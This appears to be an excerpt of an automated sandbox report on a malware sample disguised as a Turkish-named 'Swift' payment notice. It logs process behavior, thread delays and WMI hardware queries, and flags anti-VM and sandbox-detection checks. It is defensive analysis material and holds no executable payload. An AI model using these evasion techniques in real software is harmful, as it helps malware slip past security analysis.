Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory allocated: 21D5D540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory allocated: 21D76E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195380	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194700	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194265	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1131			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 8735			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1199093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1198109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197778s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1197015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196248s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1196031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195919s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195380s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1195031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194700s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3292	Thread sleep time: -1194265s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196578	Jump to behavior
